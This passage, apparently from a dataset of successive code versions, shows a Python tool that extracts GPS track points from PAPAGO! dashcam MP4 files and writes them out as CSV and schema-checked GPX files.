mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect zero padding, but got EOF.'\n )\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(mp4_file.tell() - 4 + j,\n '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n latitude = None\n if status == 'A':\n longitude_dmm = read_little_endian_single(mp4_file)\n longitude_degree = math.floor(longitude_dmm / 100)\n if longitude_degree < 0 or 180 < longitude_degree:\n 
error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect a longitude in DMM format, but got an invalid value `{longitude_dmm}'.\"\n )\n longitude_minute = longitude_dmm - longitude_degree * 100\n if longitude_minute < 0 or 60 <= longitude_minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect a longitude in DMM format, but got an invalid value `{longitude_dmm}'.\"\n )\n longitude_degree += longitude_minute / 60\n longitude = Longitude(longitude_degree)\n else:\n assert status == 'V' or status is None\n padding = mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect zero padding, but got EOF.'\n )\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(mp4_file.tell() - 4 + j,\n '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n longitude = None\n speed = read_little_endian_single(mp4_file)\n speed *= 1852 / 3600\n speed = Speed(speed)\n azimuth = read_little_endian_single(mp4_file)\n if azimuth < 0 or 360 <= azimuth:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect azimuth degree, but got an invalid value `{azimuth}'.\"\n )\n azimuth = Azimuth(azimuth)\n x_acceleration = mp4_file.read(4)\n if len(x_acceleration) < 4:\n error_position = format(mp4_file.tell() - len(\n x_acceleration), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect X-axis acceleration, but got EOF.'\n )\n x_acceleration = int.from_bytes(x_acceleration, 'little',\n signed=True)\n y_acceleration = mp4_file.read(4)\n if len(y_acceleration) < 4:\n error_position = format(mp4_file.tell() - len(\n y_acceleration), 
'#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect Y-axis acceleration, but got EOF.'\n )\n y_acceleration = int.from_bytes(y_acceleration, 'little',\n signed=True)\n z_acceleration = mp4_file.read(4)\n if len(z_acceleration) < 4:\n error_position = format(mp4_file.tell() - len(\n z_acceleration), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect Z-axis acceleration, but got EOF.'\n )\n z_acceleration = int.from_bytes(z_acceleration, 'little',\n signed=True)\n if mp4_file.tell() != small_block_end:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the end of a GPS data block, but got additional data.'\n )\n padding_size = large_block_end - small_block_end\n if padding_size < 532:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect more than or equal to 532-byte padding, but got only {padding_size}-byte padding.'\n )\n padding = mp4_file.read(padding_size)\n if len(padding) < padding_size:\n error_position = format(mp4_file.tell() - len(padding), '#010x'\n )\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect {padding_size}-byte padding, but got EOF.'\n )\n for j, b in enumerate(padding[:420]):\n if b != 0:\n error_position = format(small_block_end + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n if padding[420:532] != _UNKNOWN_BYTES:\n for j, b in enumerate(padding[420:532]):\n if b != 0:\n error_position = format(small_block_end + 420 + j,\n '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n for j, b in enumerate(padding[532:]):\n if b != 0:\n error_position = format(small_block_end + 532 + j, '#010x')\n byte = format(b, '#04x')\n raise 
GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n track_point = TrackPoint(time, status, latitude, longitude,\n speed, azimuth, x_acceleration, y_acceleration, z_acceleration)\n track_points.append(track_point)\n return track_points\n\n\ndef read_input_paths(input_paths: List[pathlib.Path]) ->List[TrackPoint]:\n track_points = []\n for input_path in input_paths:\n if input_path.is_dir():\n file_paths = []\n for dirpath, dirnames, filenames in os.walk(input_path):\n dirpath = pathlib.Path(dirpath)\n for filename in filenames:\n file_path = dirpath / filename\n if file_path.suffix not in ('.mp4', '.MP4'):\n continue\n file_paths.append(file_path)\n file_paths.sort()\n for file_path in file_paths:\n track_points.extend(parse_mp4_file(file_path))\n else:\n track_points.extend(parse_mp4_file(input_path))\n return track_points\n\n\ndef write_csv_file(args: Arguments, track_points: List[TrackPoint]\n ) ->pathlib.Path:\n if args.name is None:\n print(\"`--name' is required to output a CSV file.\", file=sys.stderr)\n sys.exit(1)\n csv_file_path = pathlib.Path(f'{args.name}.csv')\n if csv_file_path.exists():\n if not args.overwrite:\n print(f'{csv_file_path}: File already exists.', file=sys.stderr)\n sys.exit(1)\n with open(csv_file_path, 'w') as csv_file:\n for track_point in track_points:\n print(track_point.format_as_csv(), file=csv_file)\n return csv_file_path\n\n\ndef create_track_segments(args: Arguments, track_points: List[TrackPoint]\n ) ->List[TrackSegment]:\n new_track_points = []\n for track_point in track_points:\n if track_point.status != 'A':\n assert track_point.latitude is None\n assert track_point.longitude is None\n continue\n assert track_point.latitude is not None\n assert track_point.longitude is not None\n new_track_points.append(track_point)\n track_points = new_track_points\n track_points.sort()\n if len(track_points) == 0:\n return []\n unique_track_points = []\n it = 
iter(track_points)\n representative_track_point = next(it)\n while True:\n track_point = next(it, None)\n if track_point is None:\n unique_track_points.append(representative_track_point)\n break\n if track_point.time != representative_track_point.time:\n unique_track_points.append(representative_track_point)\n representative_track_point = track_point\n continue\n if (track_point.latitude == representative_track_point.latitude and\n track_point.longitude == representative_track_point.longitude):\n continue\n if args.how_to_unique == 'first':\n continue\n elif args.how_to_unique == 'last':\n representative_track_point = track_point\n else:\n raise RuntimeError(\n \"There exist track points with the same timestamp but different coordinates. Use `--uniq' option.\"\n )\n track_segments = []\n track_segments.append(TrackSegment())\n for track_point in unique_track_points:\n track_segments[0].append_track_point(track_point)\n return track_segments\n\n\ndef as_xml_attribute(data: str) ->str:\n return xml.sax.saxutils.quoteattr(data)\n\n\ndef as_xml_data(data: str) ->str:\n return xml.sax.saxutils.escape(data)\n\n\ndef get_local_time_in_iso8601() ->str:\n utc_now = datetime.datetime.now(datetime.timezone.utc)\n local_aware_now = utc_now.astimezone()\n local_time_in_iso8601 = local_aware_now.strftime('%Y-%m-%dT%H:%M:%S%z')\n return re.sub('([+-]\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', local_time_in_iso8601)\n\n\ndef write_gpx_file(args: Arguments, track_segments: List[TrackSegment]\n ) ->pathlib.Path:\n all_track_points = []\n for track_segment in track_segments:\n for track_point in track_segment:\n all_track_points.append(track_point)\n name = args.name\n if name is None:\n if len(all_track_points) == 0:\n raise ValueError(\n \"`--name' is not specified, and there is no track point.\")\n all_track_points.sort()\n name = all_track_points[0].name\n gpx_file_path = pathlib.Path(f'{name}.gpx')\n bounds = None\n if len(all_track_points) > 0:\n latitudes = list(t.latitude for t in 
all_track_points)\n latitudes.sort()\n longitudes = list(t.longitude for t in all_track_points)\n longitudes.sort()\n bounds = latitudes[0], longitudes[0], latitudes[-1], longitudes[-1]\n if gpx_file_path.exists():\n if not args.overwrite:\n print(f'{gpx_file_path}: Error: File already exists.', file=sys\n .stderr)\n sys.exit(1)\n with open(gpx_file_path, 'w') as gpx_file:\n print('<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\" ?>',\n file=gpx_file)\n print(\n '<gpx xmlns=\"http://www.topografix.com/GPX/1/1\" version=\"1.1\" creator=\"papago2gpx\">'\n , file=gpx_file)\n print(' <metadata>', file=gpx_file)\n print(f' <name>{as_xml_data(name)}</name>', file=gpx_file)\n if args.description is not None:\n description = as_xml_data(args.description)\n print(f' <desc>{description}</desc>', file=gpx_file)\n if args.author_name is not None or args.author_email is not None:\n print(' <author>', file=gpx_file)\n if args.author_name is not None:\n author_name = as_xml_data(args.author_name)\n print(f' <name>{author_name}</name>', file=gpx_file)\n if args.author_email is not None:\n author_email_parts = args.author_email.split('@', 1)\n if len(author_email_parts) != 2:\n raise RuntimeError(\n f'An invalid E-mail address: {args.author_email}')\n author_email_id = as_xml_attribute(author_email_parts[0])\n author_email_domain = as_xml_attribute(author_email_parts[1])\n print(\n f' <email id={author_email_id} domain={author_email_domain}/>'\n , file=gpx_file)\n print(' </author>', file=gpx_file)\n if args.copyright is not None:\n copyright = as_xml_attribute(args.copyright)\n print(f' <copyright author={copyright}', end='', file=gpx_file)\n copyright_year = args.copyright_year\n copyright_license = args.copyright_license\n if copyright_year is not None or copyright_license is not None:\n print('>', file=gpx_file)\n if copyright_year is not None:\n copyright_year = as_xml_data(str(copyright_year))\n print(f' <year>{copyright_year}</year>', file=gpx_file\n )\n if 
copyright_license is not None:\n copyright_license = as_xml_data(copyright_license)\n print(f' <license>{copyright_license}</license>',\n file=gpx_file)\n print(' </copyright>', file=gpx_file)\n else:\n print('/>', file=gpx_file)\n print(f' <time>{get_local_time_in_iso8601()}</time>', file=gpx_file)\n if args.keywords is not None:\n keywords = as_xml_data(args.keywords)\n print(f' <keywords>{keywords}</keywords>', file=gpx_file)\n if bounds is not None:\n print(\n f' <bounds minlat=\"{bounds[0]}\" minlon=\"{bounds[1]}\" maxlat=\"{bounds[2]}\" maxlon=\"{bounds[3]}\"/>'\n , file=gpx_file)\n print(' </metadata>', file=gpx_file)\n print(' <trk>', file=gpx_file)\n if args.track_name is not None:\n track_name = as_xml_data(args.track_name)\n print(f' <name>{track_name}</name>', file=gpx_file)\n if args.track_comment is not None:\n track_comment = as_xml_data(args.track_comment)\n print(f' <cmt>{track_comment}</cmt>', file=gpx_file)\n if args.track_description is not None:\n track_description = as_xml_data(args.track_description)\n print(f' <desc>{track_description}</desc>', file=gpx_file)\n if args.track_type is not None:\n track_type = as_xml_data(args.track_type)\n print(f' <type>{track_type}</type>', file=gpx_file)\n for track_segment in track_segments:\n print(' <trkseg>', file=gpx_file)\n for track_point in track_segment:\n print(\n f' <trkpt lat=\"{track_point.latitude}\" lon=\"{track_point.longitude}\">'\n , file=gpx_file)\n print(f' <time>{track_point.time}</time>', file=gpx_file\n )\n print(' </trkpt>', file=gpx_file)\n print(' </trkseg>', file=gpx_file)\n print(' </trk>', file=gpx_file)\n print('</gpx>', file=gpx_file)\n proc = subprocess.run(['xmllint', '--schema', 'gpx.xsd', str(\n gpx_file_path)], stdin=subprocess.DEVNULL, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, encoding='UTF-8')\n if proc.returncode != 0:\n print(\n f\"\"\"Failed to validate the GPX file `{gpx_file_path}'.\ncommand: {proc.args}\nstdout: {proc.stdout}\nstderr: 
{proc.stderr}\nreturncode: {proc.returncode}\"\"\"\n , file=sys.stderr)\n return gpx_file_path\n\n\nif __name__ == '__main__':\n args = Arguments()\n track_points = read_input_paths(args.input_paths)\n csv_file_path = write_csv_file(args, track_points)\n print(f\"Succeeded! The result is output to `{csv_file_path}'.\")\n track_segments = create_track_segments(args, track_points)\n if args.name is None and len(track_segments) == 0:\n print(\"`--name' is not specified, and there is no track segment.\",\n file=sys.stderr)\n sys.exit(1)\n if len(track_segments) == 0:\n print('WARNING: There is no track segment.', file=sys.stderr)\n gpx_file_path = write_gpx_file(args, track_segments)\n print(f\"Succeeded! The result is output to `{gpx_file_path}'.\")\n sys.exit(0)\n",
"step-5": "#!/usr/bin/env python3\n\nimport re\nimport datetime\nimport math\nimport pathlib\nimport os\nimport io\nimport argparse\nimport subprocess\nimport xml.sax.saxutils\nfrom typing import (Optional, List, Iterable)\nimport sys\n\n\n_DEFAULT_TRACK_TYPE = 'Dashcam track'\n\n\nclass Arguments(object):\n def __init__(self):\n parser = argparse.ArgumentParser(\n prog='papago2gpx', description='Extract GPS data from MP4 video\\\n files created by PAPAGO! dashcams, and format them into a GPX file.')\n parser.add_argument('input_paths', nargs='+',\n help='The path to an input file or directory.',\n metavar='INPUT_PATH')\n parser.add_argument('--name', help='The name of the GPX file to\\\n output. Default to 16 deciaml digits representing the first GPS record time.',\n metavar='NAME')\n parser.add_argument('--description', help='The description of the GPX\\\n file to output.', metavar='DESCRIPTION')\n parser.add_argument('--author-name', help='The name of the author of\\\n the GPX file to output.', metavar='AUTHOR_NAME')\n parser.add_argument('--author-email', help='The Email address of the\\\n author of the GPX file to output.', metavar='AUTHOR_EMAIL')\n parser.add_argument('--copyright', help=\"The copyright holder of the\\\n GPX file to output. Default to `AUTHOR_NAME'.\", metavar='COPYRIGHT')\n parser.add_argument('--copyright-year', help=\"The copyright year of\\\n the GPX file to output. 
Default to the year the file is created.\",\n metavar='COPYRIGHT_YEAR')\n parser.add_argument('--copyright-license', help='A link to an external\\\n file containing license text.', metavar='LICENSE')\n parser.add_argument('--keywords', help='Keywords associated with the\\\n GPX file to output.', metavar='KEYWORDS')\n parser.add_argument('--track-name', help='The name of the track.',\n metavar='TRACK_NAME')\n parser.add_argument(\n '--track-comment', help='The comment of the track.',\n metavar='TRACK_COMMENT')\n parser.add_argument('--track-description', help=\"The description of\\\n the track.\", metavar='TRACK_DESCRIPTION')\n parser.add_argument(\n '--track-type', default=_DEFAULT_TRACK_TYPE,\n help=f\"The type of the track. Default to `{_DEFAULT_TRACK_TYPE}'.\")\n parser.add_argument('--uniq', choices=['first', 'last'],\n help='How to process different coordinates\\\n recorded at the same timestamp. Default to an error.')\n parser.add_argument('--overwrite', action='store_true',\n help='Allow to overwrite an existing file.')\n\n args = parser.parse_args()\n\n self._input_paths = []\n for input_path in args.input_paths:\n input_path = pathlib.Path(input_path)\n if not input_path.exists():\n print(f\"{input_path}: File does not exist.\", file=sys.stderr)\n sys.exit(1)\n self._input_paths.append(input_path)\n\n self._name = args.name\n\n self._description = args.description\n\n self._author_name = args.author_name\n\n self._author_email = args.author_email\n\n self._copyright = args.copyright\n if self._copyright is None and self._author_name is not None:\n self._copyright = self._author_name\n\n self._copyright_year = args.copyright_year\n if self._copyright_year is not None and self._copyright is None:\n print(\"`--copyright-year' is specified, but `--copyright' is not.\",\n file=sys.stderr)\n sys.exit(1)\n if self._copyright_year is None and self._copyright is not None:\n utc_now = datetime.datetime.now(datetime.timezone.utc)\n local_aware_now = 
utc_now.astimezone()\n self._copyright_year = local_aware_now.year\n\n self._copyright_license = args.copyright_license\n if self._copyright_license is not None and self._copyright is None:\n print(\"`--copyright-license' is specified, but `--copyright' is\\\n not.\", file=sys.stderr)\n sys.exit(1)\n\n self._keywords = args.keywords\n\n self._track_name = args.track_name\n\n self._track_comment = args.track_comment\n\n self._track_description = args.track_description\n\n self._track_type = args.track_type\n if self._track_type is None:\n self._track_type = _DEFAULT_TRACK_TYPE\n if self._track_type == '':\n self._track_type = None\n\n self._how_to_unique = args.uniq\n\n self._overwrite = args.overwrite\n\n @property\n def input_paths(self) -> List[pathlib.Path]:\n return self._input_paths\n\n @property\n def name(self) -> Optional[str]:\n return self._name\n\n @property\n def description(self) -> Optional[str]:\n return self._description\n\n @property\n def author_name(self) -> Optional[str]:\n return self._author_name\n\n @property\n def author_email(self) -> Optional[str]:\n return self._author_email\n\n @property\n def copyright(self) -> Optional[str]:\n return self._copyright\n\n @property\n def copyright_year(self) -> Optional[int]:\n return self._copyright_year\n\n @property\n def copyright_license(self) -> Optional[str]:\n return self._copyright_license\n\n @property\n def keywords(self) -> Optional[str]:\n return self._keywords\n\n @property\n def track_name(self) -> Optional[str]:\n return self._track_name\n\n @property\n def track_comment(self) -> Optional[str]:\n return self._track_comment\n\n @property\n def track_description(self) -> Optional[str]:\n return self._track_description\n\n @property\n def track_type(self) -> Optional[str]:\n return self._track_type\n\n @property\n def how_to_unique(self) -> str:\n return self._how_to_unique\n\n @property\n def overwrite(self) -> bool:\n return self._overwrite\n\n\nclass BrokenMp4FileError(RuntimeError):\n 
def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataError(RuntimeError):\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataBlockIndex(object):\n def __init__(self, position: int, size: int):\n if position <= 0:\n raise ValueError(f\"An invalid position: `{position}'.\")\n if size <= 0:\n raise ValueError(f\"An invalid size: `{size}'.\")\n self._position = position\n self._size = size\n\n @property\n def position(self) -> int:\n return self._position\n\n @property\n def size(self) -> int:\n return self._size\n\n\ndef get_gps_data_block_indices(mp4_file: io.FileIO) -> List[GpsDataBlockIndex]:\n target_box_path = ['moov', 'gps ']\n while True:\n box_size = mp4_file.read(4)\n if len(box_size) == 0:\n raise GpsDataError(\n f'{mp4_file.name}: Could not find any GPS data block index.')\n if len(box_size) < 4:\n error_position = format(mp4_file.tell() - len(box_size), '#010x')\n raise BrokenMp4FileError(f'{mp4_file.name}:{error_position}:\\\n Expect the size of a box, but got EOF.')\n box_size = int.from_bytes(box_size, 'big')\n\n box_type = mp4_file.read(4)\n if len(box_type) < 4:\n error_position = format(mp4_file.tell() - len(box_type), '#010x')\n raise BrokenMp4FileError(f'{mp4_file.name}:{error_position}:\\\n Expect the type of a box, but got EOF.')\n box_type = box_type.decode('UTF-8')\n\n if box_size == 0:\n box_size = None\n next_position = None\n elif box_size == 1:\n box_size = mp4_file.read(8)\n if len(box_size) < 8:\n error_position = format(mp4_file.tell() - len(box_size),\n '#010x')\n raise BrokenMp4FileError(f'{mp4_file.name}:{error_position}:\\\n Expect the size of a box, but got EOF.')\n box_size = int.from_bytes(box_size, 'big')\n next_position = mp4_file.tell() + box_size - 16\n else:\n next_position = mp4_file.tell() + box_size - 8\n\n if box_type == target_box_path[0]:\n target_box_path.pop(0)\n if len(target_box_path) == 0:\n break\n else:\n if next_position is None:\n raise 
GpsDataError(f'{mp4_file.name}: Could not find any GPS'\n ' data block index.')\n mp4_file.seek(next_position)\n if mp4_file.tell() != next_position:\n raise BrokenMp4FileError(f'{mp4_file.name}: The size of a box\\\n is not equal to the actual one.')\n\n unknown = mp4_file.read(4)\n if len(unknown) < 4:\n error_position = format(mp4_file.tell() - len(unknown), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a'\n ' big-endian 32-bit unsigned integer, but got EOF.')\n unknown = int.from_bytes(unknown, 'big')\n if unknown != 257:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect a\\\n big-endian 32-bit unsigned integer with value `257', but got `{unknown}'.\")\n\n gps_data_block_count = mp4_file.read(4)\n if len(gps_data_block_count) < 4:\n error_position = format(mp4_file.tell() - len(gps_data_block_count),\n '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a'\n ' big-endian 32-bit unsigned integer, but got EOF.')\n gps_data_block_count = int.from_bytes(gps_data_block_count, 'big')\n\n gps_data_block_indices = []\n for i in range(gps_data_block_count):\n position = mp4_file.read(4)\n if len(position) < 4:\n error_position = format(mp4_file.tell() - len(position), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect the'\n ' position of a GPS data block, but got EOF.')\n position = int.from_bytes(position, 'big')\n if position < 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect the\\\n position of a GPS data block, but got an invalid value `{position}'.\")\n\n size = mp4_file.read(4)\n if len(size) < 4:\n error_position = format(mp4_file.tell() - len(size), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect the'\n ' size of a GPS data block, but got EOF.')\n size = int.from_bytes(size, 'big')\n if size < 0:\n error_position = 
format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect the\\\n size of a GPS data block, but got an invalid value `{size}'.\")\n\n if position == 0 or size == 0:\n print(f'{mp4_file.name}: Warning: The index of GPS data blocks is\\\n not recorded.', file=sys.stderr)\n else:\n gps_data_block_index = GpsDataBlockIndex(position, size)\n gps_data_block_indices.append(gps_data_block_index)\n\n if mp4_file.tell() != next_position:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(f'{mp4_file_path}:{error_position}: Expect EOF, but'\n ' find additional data.')\n\n return gps_data_block_indices\n\n\ndef read_little_endian_single(mp4_file: io.FileIO) -> float:\n data = mp4_file.read(4)\n if len(data) < 4:\n error_position = format(mp4_file.tell() - len(data), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a\\\n little-endian single-precision floating point number, but got EOF.')\n data = int.from_bytes(data, 'little')\n\n sign = (data & 0x80000000) >> 31\n exponent = ((data & 0x7F800000) >> 23) - 127\n mantissa = (data & 0x007FFFFF) | 0x00800000\n\n sign = '+' if sign == 0 else '-'\n exponent = str(exponent - 23)\n mantissa_hex = format(mantissa, '08x')\n return float.fromhex(f'{sign}0x{mantissa_hex}p{exponent}')\n\n\nclass Time(object):\n def __init__(self, time: datetime.datetime):\n if time.tzinfo is None:\n raise ValueError(\n \"Expect an aware `datetime' object, but got naive one.\")\n\n self._time = time.astimezone(datetime.timezone.utc)\n\n def as_local_time(self) -> datetime.datetime:\n return self._time.astimezone()\n\n def __repr__(self) -> str:\n result = self._time.strftime(\"%Y-%m-%dT%H:%M:%S%z\")\n return re.sub('(\\\\+\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', result)\n\n def __lt__(self, other) -> bool:\n return self._time < other._time\n\n def __eq__(self, other) -> bool:\n return self._time == other._time\n\n\nclass Latitude(object):\n def __init__(self, degree: 
float):\n if degree < -90 or 90 < degree:\n raise ValueError(\"An invalid latitude degree: `{degree}'.\")\n\n self._degree = degree\n\n def __repr__(self) -> str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) -> bool:\n return self._degree < other._degree\n\n def __eq__(self, other) -> bool:\n return self._degree == other._degree\n\n\nclass Longitude(object):\n def __init__(self, degree: float):\n if degree < -180 or 180 < degree:\n raise ValueError(\"An invalid longitude degree: `{degree}'.\")\n\n self._degree = degree\n\n def __repr__(self) -> str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) -> bool:\n return self._degree < other._degree\n\n def __eq__(self, other) -> bool:\n return self._degree == other._degree\n\n\nclass Speed(object):\n def __init__(self, meter_per_second: float):\n self._meter_per_second = meter_per_second\n\n def __repr__(self) -> str:\n return format(self._meter_per_second, '.2F')\n\n\nclass Azimuth(object):\n def __init__(self, degree: float):\n if degree < 0 or 360 <= degree:\n raise ValueError(f\"An invalid azimuth degree: `{degree}'.\")\n\n self._degree = degree\n\n def __repr__(self) -> str:\n return format(self._degree, '.2F')\n\n\nclass TrackPoint(object):\n def __init__(self, time: Time, status: str, latitude: Optional[Latitude],\n longitude: Optional[Longitude], speed: Speed,\n azimuth: Azimuth, x_acceleration: int, y_acceleration: int,\n z_acceleration: int):\n if (status == 'V' or status is None) != (latitude is None):\n raise ValueError('Inconsistent arguments:'\n f' status = {status}, latitude = {latitude}')\n if (status == 'V' or status is None) != (longitude is None):\n raise ValueError('Inconsistent arguments:'\n f' status = {status}, longitude = {longitude}')\n\n self._time = time\n self._status = status\n self._latitude = latitude\n self._longitude = longitude\n self._speed = speed\n self._azimuth = azimuth\n self._x_acceleration = x_acceleration\n self._y_acceleration = 
y_acceleration\n self._z_acceleration = z_acceleration\n\n @property\n def time(self) -> Time:\n return self._time\n\n @property\n def status(self) -> str:\n return self._status\n\n @property\n def latitude(self) -> Optional[Latitude]:\n return self._latitude\n\n @property\n def longitude(self) -> Optional[Longitude]:\n return self._longitude\n\n @property\n def speed(self) -> Speed:\n return self._speed\n\n @property\n def azimuth(self) -> Azimuth:\n return self._azimuth\n\n @property\n def x_acceleration(self) -> int:\n return self._x_acceleration\n\n @property\n def y_acceleration(self) -> int:\n return self._y_acceleration\n\n @property\n def z_acceleration(self) -> int:\n return self._z_acceleration\n\n @property\n def name(self) -> str:\n local_time = self._time.as_local_time()\n return local_time.strftime('%Y%m%d%H%M%S')\n\n def format_as_csv(self) -> str:\n if self._time is not None:\n local_time = self._time.as_local_time()\n result = local_time.strftime('%Y/%m/%d %H:%M:%S')\n else:\n result = ''\n status = self._status if self._status is not None else ''\n result += f',{status}'\n latitude = str(self._latitude) if self._latitude is not None else ''\n result += f',{latitude}'\n longitude = str(self._longitude) if self._longitude is not None else ''\n result += f',{longitude}'\n result += f',{self._speed}'\n result += f',{self._azimuth}'\n result += f',{self._x_acceleration}'\n result += f',{self._y_acceleration}'\n result += f',{self._z_acceleration}'\n return result\n\n def __repr__(self) -> str:\n latitude = str(self._latitude) if self._latitude is not None else ''\n longitude = str(self._longitude) if self._longitude is not None else ''\n return f'{self._time},{latitude},{longitude}'\n\n def __lt__(self, other) -> bool:\n return self._time < other._time\n\n def __eq__(self, other) -> bool:\n return self._time == other._time and self._latitude == other._latitude\\\n and self._longitude == other._longitude\n\n\nclass TrackSegment(object):\n def 
__init__(self):\n self._track_points = []\n\n def append_track_point(self, track_point: TrackPoint) -> None:\n self._track_points.append(track_point)\n\n def __len__(self) -> int:\n return len(self._track_points)\n\n def __iter__(self) -> Iterable[TrackPoint]:\n return iter(self._track_points)\n\n\n_UNKNOWN_BYTES\\\n = b'\\x00\\x21\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\xBC\\xC7\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x3C\\xDB\\x17\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x18\\xB5\\x18\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\xA0\\xFE\\x19\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\\n\\x20\\xF9\\x1B\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x01\\x00\\x00\\x00\\\n\\xAC\\xB3\\x1C\\x00\\x00\\x00\\x00\\x00\\x80\\x01\\x00\\x00\\x00\\x00\\x00\\x00'\n\n\ndef parse_mp4_file(mp4_file_path: pathlib.Path) -> List[TrackPoint]:\n track_points = []\n\n with open(mp4_file_path, 'rb') as mp4_file:\n gps_data_block_indices = get_gps_data_block_indices(mp4_file)\n\n for gps_data_block_index in gps_data_block_indices:\n mp4_file.seek(gps_data_block_index.position)\n if mp4_file.tell() != gps_data_block_index.position:\n error_position = gps_data_block_index.position\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' a GPS data block, but got EOF.')\n\n large_block_size = mp4_file.read(4)\n if len(large_block_size) < 4:\n error_position = format(\n mp4_file.tell() - len(large_block_size), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n the size of a GPS data block, but got EOF.')\n large_block_size = int.from_bytes(large_block_size, 'big')\n if large_block_size != gps_data_block_index.size:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f'{mp4_file_path}:{error_position}: The\\\n size of a GPS data block is not equal to the one stored in the index.')\n\n 
large_block_end = mp4_file.tell() - 4 + large_block_size\n\n signature = mp4_file.read(8)\n if len(signature) < 8:\n error_position = format(mp4_file.tell() - len(signature),\n '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n the signature of a GPS data block, but got EOF.')\n signature = signature.decode('UTF-8')\n if signature != 'freeGPS ':\n error_position = format(mp4_file.tell() - 8, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n `freeGPS ' as the signature of a GPS data block, but got `{signature}'.\")\n\n small_block_size = mp4_file.read(4)\n if len(small_block_size) < 4:\n error_position = format(\n mp4_file.tell() - len(small_block_size), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect\\\n the size of a GPS data block, but got EOF.')\n small_block_size = int.from_bytes(small_block_size, 'little')\n if small_block_size != 88:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect\\\n `88' as the size of a GPS data block, but got `{small_block_size}'.\")\n\n small_block_end = mp4_file.tell() + small_block_size\n\n padding = mp4_file.read(32)\n if len(padding) < 32:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' zero padding, but got EOF.')\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(mp4_file.tell() - 32 + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}:\\\n Expect zero padding, but got an invalid byte `{byte}'.\")\n\n hour = mp4_file.read(4)\n if len(hour) < 4:\n error_position = format(mp4_file.tell() - len(hour), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect'\n ' the hour of time, but got EOF.')\n hour = int.from_bytes(hour, 'little')\n if hour < 0 or 24 <= hour:\n error_position = format(mp4_file.tell() - 4, 
